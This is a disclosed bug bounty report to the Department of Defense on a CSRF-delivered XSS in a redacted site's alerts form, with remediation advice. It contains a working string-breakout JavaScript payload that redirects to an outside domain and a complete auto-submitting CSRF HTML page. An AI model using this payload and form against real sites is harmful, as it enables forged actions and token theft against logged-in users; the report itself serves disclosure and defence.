CSRF to XSS

Disclosed: 2024-12-18 19:43:14 By k0x To deptofdefense
Severity: Medium

## Vulnerability Details
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are two distinct attack vectors, but chaining them increases the impact of either one on its own.

- **XSS (Cross-Site Scripting):** An attacker injects script (typically JavaScript) into a page served by a trusted site, and that script runs in the victim's browser with the privileges of the site's origin. It can read what the origin can read (page content, cookies not marked `HttpOnly`, tokens held in the DOM or in web storage) and issue requests on the victim's behalf.
- **CSRF (Cross-Site Request Forgery):** An attacker's page causes the victim's browser to send a state-changing request to an application where the victim is logged in; the browser attaches the victim's session cookies automatically. CSRF alone cannot read the response. Combined with XSS it does not need to, because script running in the application's origin can read the anti-CSRF token from the page and submit forms with it, so token-based CSRF defences no longer hold.

In this report the chain runs the other way round: the cross-site POST to `/alerts` is the delivery mechanism, and its `source[]` parameter carries an XSS payload. The payload's shape shows the context it lands in: the application emits the value unencoded inside a double-quoted JavaScript string literal in a function call, so the payload opens with `");` to close the literal and the enclosing call, appends its own statements, and ends with `//` to comment out the remainder of the original line.

## Impact

- **Stealing authentication tokens:** The injected script runs in the application's origin, so it can read session material and anti-CSRF tokens from the page (and any cookie without `HttpOnly` via `document.cookie`) and forward them to the attacker, who can then forge authenticated requests directly.
- **Automating malicious actions:** The script can build and submit requests itself (changing account details, creating or deleting alerts, and so on) as the victim, using whatever anti-CSRF token the page exposes, so the requests are indistinguishable from legitimate ones on the server side.
- **Higher attack success rate:** Because the attacker's script has same-origin access, anti-CSRF tokens stop protecting the user: they are read from the DOM and sent like any other form field.

## System Host(s)

www.█████

## Affected Product(s) and Version(s)

## CVE Numbers

## Steps to Reproduce

**Step 1:** Malicious JavaScript payload

The following is the proof-of-concept payload submitted in the `source[]` parameter. As written it only pops an alert and, after five seconds, redirects the victim to the reporter's domain; a cookie-stealing variant would read `document.cookie` (cookies without `HttpOnly`) and send it to an attacker-controlled endpoint instead. The leading `");` and trailing `//` are what break out of the string literal the value is emitted into:

```javascript
video"); alert('Hacked by k0x'); setTimeout(()=>location.href='████',5000);//
```

**Step 2:** Malicious website for CSRF

An attacker crafts a malicious website that submits the form below to the vulnerable application.
When the victim opens the attacker's link, the page submits the form automatically (no click on the form itself is needed, and the victim could equally be redirected to the page without clicking anything). The form posts the payload in `source[]`, and the browser attaches the victim's session cookies to the cross-site request. Note that the PoC carries a fixed `csrf_token` value and the reporter's own `member_email_id`; for the request to succeed from the victim's browser, the application must accept that token regardless of which session submits it. The HTML was produced by Burp Suite's CSRF PoC generator, which HTML-encodes non-alphanumeric characters in field names and values (`&#95;` is `_`, `&#41;&#59;` is `);`, and so on):

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://www.████████/alerts" method="POST">
      <input type="hidden" name="csrf&#95;token" value="75ce3b80fbeb820dc230d2cf674283a5" />
      <input type="hidden" name="alerts&#95;invite&#95;id" value="" />
      <input type="hidden" name="hash" value="" />
      <input type="hidden" name="search&#95;type" value="content" />
      <input type="hidden" name="search" value="kaos" />
      <input type="hidden" name="phrase" value="0" />
      <input type="hidden" name="phrase" value="1" />
      <input type="hidden" name="features&#95;name" value="" />
      <input type="hidden" name="features&#95;input" value="" />
      <input type="hidden" name="feed&#95;channels&#95;name" value="" />
      <input type="hidden" name="feed&#95;channels&#95;input" value="" />
      <input type="hidden" name="radius&#95;name" value="" />
      <input type="hidden" name="radius&#95;input" value="" />
      <input type="hidden" name="radius&#95;range" value="10" />
      <input type="hidden" name="state&#95;name" value="&#45;1" />
      <input type="hidden" name="state&#95;input" value="" />
      <input type="hidden" name="hometown&#95;name" value="" />
      <input type="hidden" name="hometown&#95;input" value="" />
      <input type="hidden" name="personnel&#95;name" value="" />
      <input type="hidden" name="personnel&#95;input" value="" />
      <input type="hidden" name="publication&#95;name" value="" />
      <input type="hidden" name="publication&#95;input" value="" />
      <input type="hidden" name="series&#95;name" value="&#45;1" />
      <input type="hidden" name="series&#95;input" value="" />
      <input type="hidden" name="tags&#95;name" value="" />
      <input type="hidden" name="tags&#95;input" value="" />
      <input type="hidden" name="unit&#95;name" value="" />
      <input type="hidden" name="unit&#95;input" value="" />
      <input type="hidden" name="source&#91;&#93;" value="video&quot;&#41;&#59;&#13;&#10;alert&#40;&apos;Hacked&#32;by&#32;k0x&apos;&#41;&#59;&#13;&#10;setTimeout&#40;&#40;&#41;&#61;&gt;location&#46;href&#61;&apos;https&#58;&#47;&#47;k0x&#46;xyz&apos;&#44;5000&#41;&#59;&#47;&#47;" />
      <input type="hidden" name="freq" value="hourly" />
      <input type="hidden" name="delivery&#95;method" value="email" />
      <input type="hidden" name="member&#95;email&#95;id" value="1223198" />
      <input type="hidden" name="submit" value="CREATE&#32;NEWSWIRE" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

**Step 3:** Attack flow

1. **User logs in:** The victim logs into the vulnerable application and keeps an active session.
2. **Clicking the malicious link:** The victim receives a message or email containing the link and, on opening it, lands on the attacker-controlled page.
3. **CSRF exploitation:** The page auto-submits the POST to `/alerts`. The browser attaches the victim's session cookies, so the application processes the request as the victim, and the submitted `source[]` value, containing the payload, is later emitted into the page's inline script without encoding.
4. **Payload execution:** The payload runs in the victim's browser in the application's origin. In the PoC this is an alert and a redirect; a real attacker would exfiltrate cookies or tokens, or perform further actions (changing account settings, creating alerts, and so on) as the victim.

## Suggested Mitigation/Remediation Actions

- Encode user-supplied values for the exact context they are emitted into. For a JavaScript string literal, serialise the value as a JSON string and additionally escape `<`, `>`, U+2028 and U+2029; better still, keep user data out of inline script and pass it through a `data-` attribute or a `<script type="application/json">` block that the page's own script reads.
- Issue anti-CSRF tokens per session, bind them server-side to that session, and reject any request whose token does not match. A token that validates from another user's session, as the fixed token in the PoC implies, gives no protection.
- Set `SameSite=Lax` or `SameSite=Strict` on the session cookie and check the `Origin` header on state-changing requests as independent, additional layers.
- A Content-Security-Policy is worth deploying, but it does not stop this particular pattern on its own: the payload lands inside a script block the page already trusts (nonced or hashed), so CSP only pays off once user data has been moved out of inline script.
Report Stats
  • Report ID: 2736979
  • State: Closed
  • Substate: resolved
  • Upvotes: 1